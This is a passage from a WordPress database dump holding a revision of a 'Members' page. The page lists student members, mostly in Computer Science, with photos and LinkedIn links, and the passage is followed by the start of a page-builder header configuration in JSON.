17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c180-outer\">\n            <div data-colibri-id=\"182-c180\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c180 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c181\" class=\"d-block style-913 style-local-182-c181 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Vineeth.jpg\" class=\"wp-image-831 style-913-image style-local-182-c181-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c181-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c182\" class=\"h-global-transition-all h-heading style-914 style-local-182-c182 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c182\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Vineeth Kumar Chandha</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c183\" class=\"h-text h-text-component style-915 style-local-182-c183 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c184\" class=\"style-917 style-local-182-c184 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/vineeth-kumar-chandha-207611149/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c185-outer\">\n            <div data-colibri-id=\"182-c185\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c185 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c186\" class=\"d-block style-913 style-local-182-c186 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-sathwik-2-scaled-1.jpg\" class=\"wp-image-1007 style-913-image style-local-182-c186-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c186-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c187\" class=\"h-global-transition-all h-heading style-914 style-local-182-c187 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c187\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sathwik Chowda</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c188\" class=\"h-text h-text-component style-915 style-local-182-c188 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c189\" class=\"style-917 style-local-182-c189 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sathwikchowda/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c190-outer\">\n            <div data-colibri-id=\"182-c190\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c190 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c191\" class=\"d-block style-913 style-local-182-c191 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Brindal-1.jpeg\" class=\"wp-image-1599 style-913-image style-local-182-c191-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c191-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c192\" class=\"h-global-transition-all h-heading style-914 style-local-182-c192 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c192\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Brindal Dhol</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c193\" class=\"h-text h-text-component style-915 style-local-182-c193 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c194\" class=\"style-917 style-local-182-c194 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/brindaldhol/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c195-outer\">\n            <div data-colibri-id=\"182-c195\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c195 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c196\" class=\"d-block style-913 style-local-182-c196 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-ruby_parcells-scaled-1.jpg\" class=\"wp-image-853 style-913-image style-local-182-c196-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c196-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c197\" class=\"h-global-transition-all h-heading style-914 style-local-182-c197 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c197\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ruby Parcells</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c198\" class=\"h-text h-text-component style-915 style-local-182-c198 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c199-outer\">\n            <div data-colibri-id=\"182-c199\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c199 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c200\" class=\"d-block style-913 style-local-182-c200 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Reshmanjali-1.jpeg\" class=\"wp-image-1600 style-913-image style-local-182-c200-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c200-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c201\" class=\"h-global-transition-all h-heading style-914 style-local-182-c201 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c201\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sai Reshmanjali</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c202\" class=\"h-text h-text-component style-915 style-local-182-c202 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c203\" class=\"style-917 style-local-182-c203 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/reshmanjali-guntupalli/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c204-outer\">\n            <div data-colibri-id=\"182-c204\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c204 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c205\" class=\"d-block style-913 style-local-182-c205 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Bronson.png\" class=\"wp-image-817 style-913-image style-local-182-c205-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c205-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c206\" class=\"h-global-transition-all h-heading style-914 style-local-182-c206 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c206\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Bronson Tharpe</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c207\" class=\"h-text h-text-component style-915 style-local-182-c207 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c208\" class=\"style-917 style-local-182-c208 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/bronson-tharpe-9b754a1ba/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Members','','inherit','closed','closed','','182-revision-v1','','','2023-10-13 09:22:06','2023-10-13 13:22:06','',182,'https://gsudice.dataconn.net/?p=1721',0,'revision','',0),(1722,1,'2023-10-13 09:22:06','2023-10-13 13:22:06','{\"name\":\"hop-header\",\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"anchor\":false,\"backup\":{\"overlap\":{\"menu\":{\"descendants\":{\"item\":{\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"20\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"20\",\"unit\":\"px\"}},\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"px\"},\"right\":{\"value\":0,\"unit\":\"px\"},\"bottom\":{\"value\":\"10\",\"unit\":\"px\"},\"left\":{\"value\":0,\"unit\":\"px\"}}},\"link\":{\"typography\":{\"weight\":\"600\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"transform\":\"uppercase\",\"family\":\"Open Sans\",\"lineHeight\":{\"unit\":\"em\",\"value\":\"1.5\"},\"letterSpacing\":{\"unit\":\"px\",\"value\":\"0\"},\"color\":\"${theme.colors.4}\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}}}},\"submenu\":{\"boxShadow\":{\"enabled\":true,\"layers\":[{\"blur\":\"5\",\"color\":\"rgba(0, 0, 0, 0.04)\"}]}},\"submenu-item\":{\"background\":{\"color\":\"rgb(255, 255, 255)\"},\"states\":{\"hover\":{\"background\":{\"color\":\"${theme.colors.0}\"}},\"menuButtonActive\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}},\"submenu-item-link\":{\"states\":{\"hover\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}}},\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}},\"subMenuIcon\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0|variant0}\"}},\"innerMenu\":{\"justifyContent\":\"flex-end\"}},\"ancestor\":{\"sticky\":{\"descendants\":{\"link\":{\"states\":{\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0}\"}},\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}},\"typography\":{\"color\":\"${theme.colors.0|variant3}\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}}}},\"navigation\":{\"background\":{\"color\":\"transparent\"}}}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}},\"ancestor\":{\"sticky\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"25-h5\",\"parentId\":\"25-h4\",\"partialId\":25,\"styleRef\":38,\"type\":\"header\"}],\"id\":\"25-h4\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":37,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"children\":[{\"name\":\"hop-spacer\",\"slot\":null,\"parentId\":\"25-h6\",\"index\":0,\"id\":\"25-h7\",\"partialId\":25,\"styleRef\":40,\"type\":\"header\"}],\"id\":\"25-h6\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":39,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":\"86.16\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}},\"ancestor\":{\"sticky\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0